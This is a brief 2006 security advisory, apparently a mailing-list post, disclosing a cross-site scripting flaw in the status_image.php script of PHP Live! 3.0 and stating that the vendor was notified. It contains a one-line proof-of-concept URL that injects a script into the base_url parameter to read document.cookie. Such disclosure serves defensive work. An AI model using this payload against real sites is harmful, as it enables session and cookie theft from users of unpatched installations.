Date: 03/22/2006 Vendor: OSI Codes Product: PHP Live! Versions: tested 3.0 Vulnerability: Cross Site Scripting Location: status_image.php Exploit: /phplive/js/status_image.php?base_url=<script>alert(document.cookie)</script> Stumbled across this while auditing a web server, vendor has been notified. --K-sPecial